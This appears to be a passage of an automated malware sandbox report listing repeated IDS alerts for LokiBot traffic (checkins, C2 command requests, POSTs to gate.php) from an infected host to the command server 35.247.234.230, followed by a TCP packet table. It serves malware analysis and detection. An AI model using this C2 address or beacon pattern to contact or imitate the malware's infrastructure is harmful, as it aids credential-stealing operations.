                                            04/29/21-09:19:40.333359TCP2025381ET TROJAN LokiBot Checkin4977780192.168.2.335.247.234.230
                                            04/29/21-09:19:40.333359TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24977780192.168.2.335.247.234.230
                                            04/29/21-09:19:40.333359TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4977780192.168.2.335.247.234.230
                                            04/29/21-09:19:41.793613TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977880192.168.2.335.247.234.230
                                            04/29/21-09:19:41.793613TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977880192.168.2.335.247.234.230
                                            04/29/21-09:19:41.793613TCP2025381ET TROJAN LokiBot Checkin4977880192.168.2.335.247.234.230
                                            04/29/21-09:19:41.793613TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24977880192.168.2.335.247.234.230
                                            04/29/21-09:19:41.793613TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4977880192.168.2.335.247.234.230
                                            04/29/21-09:19:43.006592TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977980192.168.2.335.247.234.230
                                            04/29/21-09:19:43.006592TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977980192.168.2.335.247.234.230
                                            04/29/21-09:19:43.006592TCP2025381ET TROJAN LokiBot Checkin4977980192.168.2.335.247.234.230
                                            04/29/21-09:19:43.006592TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24977980192.168.2.335.247.234.230
                                            04/29/21-09:19:43.006592TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4977980192.168.2.335.247.234.230
                                            04/29/21-09:19:44.271005TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14978080192.168.2.335.247.234.230
                                            04/29/21-09:19:44.271005TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4978080192.168.2.335.247.234.230
                                            04/29/21-09:19:44.271005TCP2025381ET TROJAN LokiBot Checkin4978080192.168.2.335.247.234.230
                                            04/29/21-09:19:44.271005TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24978080192.168.2.335.247.234.230
                                            04/29/21-09:19:44.271005TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4978080192.168.2.335.247.234.230
                                            04/29/21-09:19:45.490786TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14978180192.168.2.335.247.234.230
                                            04/29/21-09:19:45.490786TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4978180192.168.2.335.247.234.230
                                            04/29/21-09:19:45.490786TCP2025381ET TROJAN LokiBot Checkin4978180192.168.2.335.247.234.230
                                            04/29/21-09:19:45.490786TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24978180192.168.2.335.247.234.230
                                            04/29/21-09:19:45.490786TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4978180192.168.2.335.247.234.230
                                            04/29/21-09:19:46.703122TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14978280192.168.2.335.247.234.230
                                            04/29/21-09:19:46.703122TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4978280192.168.2.335.247.234.230
                                            04/29/21-09:19:46.703122TCP2025381ET TROJAN LokiBot Checkin4978280192.168.2.335.247.234.230
                                            04/29/21-09:19:46.703122TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24978280192.168.2.335.247.234.230
                                            04/29/21-09:19:46.703122TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4978280192.168.2.335.247.234.230
                                            04/29/21-09:19:47.909072TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14978380192.168.2.335.247.234.230
                                            04/29/21-09:19:47.909072TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4978380192.168.2.335.247.234.230
                                            04/29/21-09:19:47.909072TCP2025381ET TROJAN LokiBot Checkin4978380192.168.2.335.247.234.230
                                            04/29/21-09:19:47.909072TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24978380192.168.2.335.247.234.230
                                            04/29/21-09:19:47.909072TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4978380192.168.2.335.247.234.230
                                            04/29/21-09:19:49.118558TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14978480192.168.2.335.247.234.230
                                            04/29/21-09:19:49.118558TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4978480192.168.2.335.247.234.230
                                            04/29/21-09:19:49.118558TCP2025381ET TROJAN LokiBot Checkin4978480192.168.2.335.247.234.230
                                            04/29/21-09:19:49.118558TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24978480192.168.2.335.247.234.230
                                            04/29/21-09:19:49.118558TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4978480192.168.2.335.247.234.230
                                            04/29/21-09:19:50.337780TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14978580192.168.2.335.247.234.230
                                            04/29/21-09:19:50.337780TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4978580192.168.2.335.247.234.230
                                            04/29/21-09:19:50.337780TCP2025381ET TROJAN LokiBot Checkin4978580192.168.2.335.247.234.230
                                            04/29/21-09:19:50.337780TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24978580192.168.2.335.247.234.230
                                            04/29/21-09:19:50.337780TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4978580192.168.2.335.247.234.230
                                            04/29/21-09:19:51.565549TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14978680192.168.2.335.247.234.230
                                            04/29/21-09:19:51.565549TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4978680192.168.2.335.247.234.230
                                            04/29/21-09:19:51.565549TCP2025381ET TROJAN LokiBot Checkin4978680192.168.2.335.247.234.230
                                            04/29/21-09:19:51.565549TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24978680192.168.2.335.247.234.230
                                            04/29/21-09:19:51.565549TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4978680192.168.2.335.247.234.230
                                            04/29/21-09:19:52.973609TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14978780192.168.2.335.247.234.230
                                            04/29/21-09:19:52.973609TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4978780192.168.2.335.247.234.230
                                            04/29/21-09:19:52.973609TCP2025381ET TROJAN LokiBot Checkin4978780192.168.2.335.247.234.230
                                            04/29/21-09:19:52.973609TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24978780192.168.2.335.247.234.230
                                            04/29/21-09:19:52.973609TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4978780192.168.2.335.247.234.230
                                            04/29/21-09:19:54.367482TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14978880192.168.2.335.247.234.230
                                            04/29/21-09:19:54.367482TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4978880192.168.2.335.247.234.230
                                            04/29/21-09:19:54.367482TCP2025381ET TROJAN LokiBot Checkin4978880192.168.2.335.247.234.230
                                            04/29/21-09:19:54.367482TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24978880192.168.2.335.247.234.230
                                            04/29/21-09:19:54.367482TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4978880192.168.2.335.247.234.230
                                            04/29/21-09:19:56.496992TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14978980192.168.2.335.247.234.230
                                            04/29/21-09:19:56.496992TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4978980192.168.2.335.247.234.230
                                            04/29/21-09:19:56.496992TCP2025381ET TROJAN LokiBot Checkin4978980192.168.2.335.247.234.230
                                            04/29/21-09:19:56.496992TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24978980192.168.2.335.247.234.230
                                            04/29/21-09:19:56.496992TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4978980192.168.2.335.247.234.230
                                            04/29/21-09:19:57.722593TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14979080192.168.2.335.247.234.230
                                            04/29/21-09:19:57.722593TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4979080192.168.2.335.247.234.230
                                            04/29/21-09:19:57.722593TCP2025381ET TROJAN LokiBot Checkin4979080192.168.2.335.247.234.230
                                            04/29/21-09:19:57.722593TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24979080192.168.2.335.247.234.230
                                            04/29/21-09:19:57.722593TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4979080192.168.2.335.247.234.230
                                            04/29/21-09:19:58.937625TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14979180192.168.2.335.247.234.230
                                            04/29/21-09:19:58.937625TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4979180192.168.2.335.247.234.230
                                            04/29/21-09:19:58.937625TCP2025381ET TROJAN LokiBot Checkin4979180192.168.2.335.247.234.230
                                            04/29/21-09:19:58.937625TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24979180192.168.2.335.247.234.230
                                            04/29/21-09:19:58.937625TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4979180192.168.2.335.247.234.230
                                            04/29/21-09:20:00.214625TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14979280192.168.2.335.247.234.230
                                            04/29/21-09:20:00.214625TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4979280192.168.2.335.247.234.230
                                            04/29/21-09:20:00.214625TCP2025381ET TROJAN LokiBot Checkin4979280192.168.2.335.247.234.230
                                            04/29/21-09:20:00.214625TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24979280192.168.2.335.247.234.230
                                            04/29/21-09:20:00.214625TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4979280192.168.2.335.247.234.230
                                            04/29/21-09:20:01.445743TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14979380192.168.2.335.247.234.230
                                            04/29/21-09:20:01.445743TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4979380192.168.2.335.247.234.230
                                            04/29/21-09:20:01.445743TCP2025381ET TROJAN LokiBot Checkin4979380192.168.2.335.247.234.230
                                            04/29/21-09:20:01.445743TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24979380192.168.2.335.247.234.230
                                            04/29/21-09:20:01.445743TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4979380192.168.2.335.247.234.230
                                            04/29/21-09:20:02.645327TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14979480192.168.2.335.247.234.230
                                            04/29/21-09:20:02.645327TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4979480192.168.2.335.247.234.230
                                            04/29/21-09:20:02.645327TCP2025381ET TROJAN LokiBot Checkin4979480192.168.2.335.247.234.230
                                            04/29/21-09:20:02.645327TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24979480192.168.2.335.247.234.230
                                            04/29/21-09:20:02.645327TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4979480192.168.2.335.247.234.230
                                            04/29/21-09:20:03.844490TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14979580192.168.2.335.247.234.230
                                            04/29/21-09:20:03.844490TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4979580192.168.2.335.247.234.230
                                            04/29/21-09:20:03.844490TCP2025381ET TROJAN LokiBot Checkin4979580192.168.2.335.247.234.230
                                            04/29/21-09:20:03.844490TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24979580192.168.2.335.247.234.230
                                            04/29/21-09:20:03.844490TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4979580192.168.2.335.247.234.230
                                            04/29/21-09:20:05.062420TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14979680192.168.2.335.247.234.230
                                            04/29/21-09:20:05.062420TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4979680192.168.2.335.247.234.230
                                            04/29/21-09:20:05.062420TCP2025381ET TROJAN LokiBot Checkin4979680192.168.2.335.247.234.230
                                            04/29/21-09:20:05.062420TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24979680192.168.2.335.247.234.230
                                            04/29/21-09:20:05.062420TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4979680192.168.2.335.247.234.230
                                            04/29/21-09:20:06.256647TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14979780192.168.2.335.247.234.230
                                            04/29/21-09:20:06.256647TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4979780192.168.2.335.247.234.230
                                            04/29/21-09:20:06.256647TCP2025381ET TROJAN LokiBot Checkin4979780192.168.2.335.247.234.230
                                            04/29/21-09:20:06.256647TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24979780192.168.2.335.247.234.230
                                            04/29/21-09:20:06.256647TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4979780192.168.2.335.247.234.230
                                            04/29/21-09:20:07.682911TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14979880192.168.2.335.247.234.230
                                            04/29/21-09:20:07.682911TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4979880192.168.2.335.247.234.230
                                            04/29/21-09:20:07.682911TCP2025381ET TROJAN LokiBot Checkin4979880192.168.2.335.247.234.230
                                            04/29/21-09:20:07.682911TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24979880192.168.2.335.247.234.230
                                            04/29/21-09:20:07.682911TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4979880192.168.2.335.247.234.230
                                            04/29/21-09:20:08.873402TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14979980192.168.2.335.247.234.230
                                            04/29/21-09:20:08.873402TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4979980192.168.2.335.247.234.230
                                            04/29/21-09:20:08.873402TCP2025381ET TROJAN LokiBot Checkin4979980192.168.2.335.247.234.230
                                            04/29/21-09:20:08.873402TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24979980192.168.2.335.247.234.230
                                            04/29/21-09:20:08.873402TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4979980192.168.2.335.247.234.230
                                            04/29/21-09:20:10.078579TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14980180192.168.2.335.247.234.230
                                            04/29/21-09:20:10.078579TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4980180192.168.2.335.247.234.230
                                            04/29/21-09:20:10.078579TCP2025381ET TROJAN LokiBot Checkin4980180192.168.2.335.247.234.230
                                            04/29/21-09:20:10.078579TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24980180192.168.2.335.247.234.230
                                            04/29/21-09:20:10.078579TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4980180192.168.2.335.247.234.230
                                            04/29/21-09:20:11.328698TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14980380192.168.2.335.247.234.230
                                            04/29/21-09:20:11.328698TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4980380192.168.2.335.247.234.230
                                            04/29/21-09:20:11.328698TCP2025381ET TROJAN LokiBot Checkin4980380192.168.2.335.247.234.230
                                            04/29/21-09:20:11.328698TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24980380192.168.2.335.247.234.230
                                            04/29/21-09:20:11.328698TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4980380192.168.2.335.247.234.230
                                            04/29/21-09:20:12.553501TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14980480192.168.2.335.247.234.230
                                            04/29/21-09:20:12.553501TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4980480192.168.2.335.247.234.230
                                            04/29/21-09:20:12.553501TCP2025381ET TROJAN LokiBot Checkin4980480192.168.2.335.247.234.230
                                            04/29/21-09:20:12.553501TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24980480192.168.2.335.247.234.230
                                            04/29/21-09:20:12.553501TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4980480192.168.2.335.247.234.230
                                            04/29/21-09:20:13.820241TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14980580192.168.2.335.247.234.230
                                            04/29/21-09:20:13.820241TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4980580192.168.2.335.247.234.230
                                            04/29/21-09:20:13.820241TCP2025381ET TROJAN LokiBot Checkin4980580192.168.2.335.247.234.230
                                            04/29/21-09:20:13.820241TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24980580192.168.2.335.247.234.230
                                            04/29/21-09:20:13.820241TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4980580192.168.2.335.247.234.230
                                            04/29/21-09:20:15.758590TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14980680192.168.2.335.247.234.230
                                            04/29/21-09:20:15.758590TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4980680192.168.2.335.247.234.230
                                            04/29/21-09:20:15.758590TCP2025381ET TROJAN LokiBot Checkin4980680192.168.2.335.247.234.230
                                            04/29/21-09:20:15.758590TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24980680192.168.2.335.247.234.230
                                            04/29/21-09:20:15.758590TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4980680192.168.2.335.247.234.230
                                            04/29/21-09:20:17.017693TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14980780192.168.2.335.247.234.230
                                            04/29/21-09:20:17.017693TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4980780192.168.2.335.247.234.230
                                            04/29/21-09:20:17.017693TCP2025381ET TROJAN LokiBot Checkin4980780192.168.2.335.247.234.230
                                            04/29/21-09:20:17.017693TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24980780192.168.2.335.247.234.230
                                            04/29/21-09:20:17.017693TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4980780192.168.2.335.247.234.230
                                            04/29/21-09:20:18.222249TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14980880192.168.2.335.247.234.230
                                            04/29/21-09:20:18.222249TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4980880192.168.2.335.247.234.230
                                            04/29/21-09:20:18.222249TCP2025381ET TROJAN LokiBot Checkin4980880192.168.2.335.247.234.230
                                            04/29/21-09:20:18.222249TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24980880192.168.2.335.247.234.230
                                            04/29/21-09:20:18.222249TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4980880192.168.2.335.247.234.230
                                            04/29/21-09:20:19.971365TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14980980192.168.2.335.247.234.230
                                            04/29/21-09:20:19.971365TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4980980192.168.2.335.247.234.230
                                            04/29/21-09:20:19.971365TCP2025381ET TROJAN LokiBot Checkin4980980192.168.2.335.247.234.230
                                            04/29/21-09:20:19.971365TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24980980192.168.2.335.247.234.230
                                            04/29/21-09:20:19.971365TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4980980192.168.2.335.247.234.230
                                            04/29/21-09:20:21.190799TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14981080192.168.2.335.247.234.230
                                            04/29/21-09:20:21.190799TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4981080192.168.2.335.247.234.230
                                            04/29/21-09:20:21.190799TCP2025381ET TROJAN LokiBot Checkin4981080192.168.2.335.247.234.230
                                            04/29/21-09:20:21.190799TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24981080192.168.2.335.247.234.230
                                            04/29/21-09:20:21.190799TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4981080192.168.2.335.247.234.230
                                            04/29/21-09:20:22.423304TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14981180192.168.2.335.247.234.230
                                            04/29/21-09:20:22.423304TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4981180192.168.2.335.247.234.230
                                            04/29/21-09:20:22.423304TCP2025381ET TROJAN LokiBot Checkin4981180192.168.2.335.247.234.230
                                            04/29/21-09:20:22.423304TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24981180192.168.2.335.247.234.230
                                            04/29/21-09:20:22.423304TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4981180192.168.2.335.247.234.230
                                            04/29/21-09:20:23.869111TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14981280192.168.2.335.247.234.230
                                            04/29/21-09:20:23.869111TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4981280192.168.2.335.247.234.230
                                            04/29/21-09:20:23.869111TCP2025381ET TROJAN LokiBot Checkin4981280192.168.2.335.247.234.230
                                            04/29/21-09:20:23.869111TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24981280192.168.2.335.247.234.230
                                            04/29/21-09:20:23.869111TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4981280192.168.2.335.247.234.230
                                            04/29/21-09:20:25.087245TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14981380192.168.2.335.247.234.230
                                            04/29/21-09:20:25.087245TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4981380192.168.2.335.247.234.230
                                            04/29/21-09:20:25.087245TCP2025381ET TROJAN LokiBot Checkin4981380192.168.2.335.247.234.230
                                            04/29/21-09:20:25.087245TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24981380192.168.2.335.247.234.230
                                            04/29/21-09:20:25.087245TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4981380192.168.2.335.247.234.230
                                            04/29/21-09:20:26.307611TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14981480192.168.2.335.247.234.230
                                            04/29/21-09:20:26.307611TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4981480192.168.2.335.247.234.230
                                            04/29/21-09:20:26.307611TCP2025381ET TROJAN LokiBot Checkin4981480192.168.2.335.247.234.230
                                            04/29/21-09:20:26.307611TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24981480192.168.2.335.247.234.230
                                            04/29/21-09:20:26.307611TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4981480192.168.2.335.247.234.230
                                            04/29/21-09:20:27.531953TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14981580192.168.2.335.247.234.230
                                            04/29/21-09:20:27.531953TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4981580192.168.2.335.247.234.230
                                            04/29/21-09:20:27.531953TCP2025381ET TROJAN LokiBot Checkin4981580192.168.2.335.247.234.230
                                            04/29/21-09:20:27.531953TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24981580192.168.2.335.247.234.230
                                            04/29/21-09:20:27.531953TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4981580192.168.2.335.247.234.230
                                            04/29/21-09:20:28.741976TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14981680192.168.2.335.247.234.230
                                            04/29/21-09:20:28.741976TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4981680192.168.2.335.247.234.230
                                            04/29/21-09:20:28.741976TCP2025381ET TROJAN LokiBot Checkin4981680192.168.2.335.247.234.230
                                            04/29/21-09:20:28.741976TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24981680192.168.2.335.247.234.230
                                            04/29/21-09:20:28.741976TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4981680192.168.2.335.247.234.230
                                            04/29/21-09:20:29.941661TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14981780192.168.2.335.247.234.230
                                            04/29/21-09:20:29.941661TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4981780192.168.2.335.247.234.230
                                            04/29/21-09:20:29.941661TCP2025381ET TROJAN LokiBot Checkin4981780192.168.2.335.247.234.230
                                            04/29/21-09:20:29.941661TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24981780192.168.2.335.247.234.230
                                            04/29/21-09:20:29.941661TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4981780192.168.2.335.247.234.230
                                            04/29/21-09:20:31.136633TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14981880192.168.2.335.247.234.230
                                            04/29/21-09:20:31.136633TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4981880192.168.2.335.247.234.230
                                            04/29/21-09:20:31.136633TCP2025381ET TROJAN LokiBot Checkin4981880192.168.2.335.247.234.230
                                            04/29/21-09:20:31.136633TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24981880192.168.2.335.247.234.230
                                            04/29/21-09:20:31.136633TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4981880192.168.2.335.247.234.230

                                            Network Port Distribution

                                            TCP Packets

                                            TimestampSource PortDest PortSource IPDest IP
                                            Apr 29, 2021 09:18:44.252146959 CEST4972180192.168.2.335.247.234.230
                                            Apr 29, 2021 09:18:44.499397039 CEST804972135.247.234.230192.168.2.3
                                            Apr 29, 2021 09:18:44.499649048 CEST4972180192.168.2.335.247.234.230
                                            Apr 29, 2021 09:18:44.502475977 CEST4972180192.168.2.335.247.234.230
                                            Apr 29, 2021 09:18:44.748511076 CEST804972135.247.234.230192.168.2.3
                                            Apr 29, 2021 09:18:44.757561922 CEST4972180192.168.2.335.247.234.230
                                            Apr 29, 2021 09:18:45.003727913 CEST804972135.247.234.230192.168.2.3
                                            Apr 29, 2021 09:18:45.282027006 CEST804972135.247.234.230192.168.2.3
                                            Apr 29, 2021 09:18:45.284086943 CEST4972180192.168.2.335.247.234.230
                                            Apr 29, 2021 09:18:45.284190893 CEST4972180192.168.2.335.247.234.230
                                            Apr 29, 2021 09:18:45.530364037 CEST804972135.247.234.230192.168.2.3
                                            Apr 29, 2021 09:18:45.563663006 CEST4972380192.168.2.335.247.234.230
                                            Apr 29, 2021 09:18:45.812927961 CEST804972335.247.234.230192.168.2.3
                                            Apr 29, 2021 09:18:45.813055992 CEST4972380192.168.2.335.247.234.230
                                            Apr 29, 2021 09:18:45.816121101 CEST4972380192.168.2.335.247.234.230
                                            Apr 29, 2021 09:18:46.065340996 CEST804972335.247.234.230192.168.2.3
                                            Apr 29, 2021 09:18:46.066150904 CEST4972380192.168.2.335.247.234.230
                                            Apr 29, 2021 09:18:46.315226078 CEST804972335.247.234.230192.168.2.3
                                            Apr 29, 2021 09:18:46.533708096 CEST804972335.247.234.230192.168.2.3
                                            Apr 29, 2021 09:18:46.533891916 CEST4972380192.168.2.335.247.234.230
                                            Apr 29, 2021 09:18:46.535284996 CEST4972380192.168.2.335.247.234.230
                                            Apr 29, 2021 09:18:46.689434052 CEST4972580192.168.2.335.247.234.230
                                            Apr 29, 2021 09:18:46.784240007 CEST804972335.247.234.230192.168.2.3
                                            Apr 29, 2021 09:18:46.934633017 CEST804972535.247.234.230192.168.2.3
                                            Apr 29, 2021 09:18:46.972208977 CEST4972580192.168.2.335.247.234.230
                                            Apr 29, 2021 09:18:46.975892067 CEST4972580192.168.2.335.247.234.230
                                            Apr 29, 2021 09:18:47.221133947 CEST804972535.247.234.230192.168.2.3
                                            Apr 29, 2021 09:18:47.225796938 CEST4972580192.168.2.335.247.234.230
                                            Apr 29, 2021 09:18:47.472121000 CEST804972535.247.234.230192.168.2.3
                                            Apr 29, 2021 09:18:47.695468903 CEST804972535.247.234.230192.168.2.3
                                            Apr 29, 2021 09:18:47.695574999 CEST4972580192.168.2.335.247.234.230
                                            Apr 29, 2021 09:18:47.695666075 CEST4972580192.168.2.335.247.234.230
                                            Apr 29, 2021 09:18:47.940809011 CEST804972535.247.234.230192.168.2.3
                                            Apr 29, 2021 09:18:48.284580946 CEST4972680192.168.2.335.247.234.230
                                            Apr 29, 2021 09:18:48.530329943 CEST804972635.247.234.230192.168.2.3
                                            Apr 29, 2021 09:18:48.530633926 CEST4972680192.168.2.335.247.234.230
                                            Apr 29, 2021 09:18:48.534118891 CEST4972680192.168.2.335.247.234.230
                                            Apr 29, 2021 09:18:48.779915094 CEST804972635.247.234.230192.168.2.3
                                            Apr 29, 2021 09:18:48.780030966 CEST4972680192.168.2.335.247.234.230
                                            Apr 29, 2021 09:18:49.025572062 CEST804972635.247.234.230192.168.2.3
                                            Apr 29, 2021 09:18:49.245944023 CEST804972635.247.234.230192.168.2.3
                                            Apr 29, 2021 09:18:49.246025085 CEST4972680192.168.2.335.247.234.230
                                            Apr 29, 2021 09:18:49.246117115 CEST4972680192.168.2.335.247.234.230
                                            Apr 29, 2021 09:18:49.491660118 CEST804972635.247.234.230192.168.2.3
                                            Apr 29, 2021 09:18:49.590291023 CEST4972780192.168.2.335.247.234.230
                                            Apr 29, 2021 09:18:49.837713003 CEST804972735.247.234.230192.168.2.3
                                            Apr 29, 2021 09:18:49.837877989 CEST4972780192.168.2.335.247.234.230
                                            Apr 29, 2021 09:18:49.841094971 CEST4972780192.168.2.335.247.234.230
                                            Apr 29, 2021 09:18:50.088462114 CEST804972735.247.234.230192.168.2.3
                                            Apr 29, 2021 09:18:50.088618994 CEST4972780192.168.2.335.247.234.230
                                            Apr 29, 2021 09:18:50.336136103 CEST804972735.247.234.230192.168.2.3
                                            Apr 29, 2021 09:18:50.552958965 CEST804972735.247.234.230192.168.2.3
                                            Apr 29, 2021 09:18:50.553005934 CEST804972735.247.234.230192.168.2.3
                                            Apr 29, 2021 09:18:50.553138971 CEST4972780192.168.2.335.247.234.230
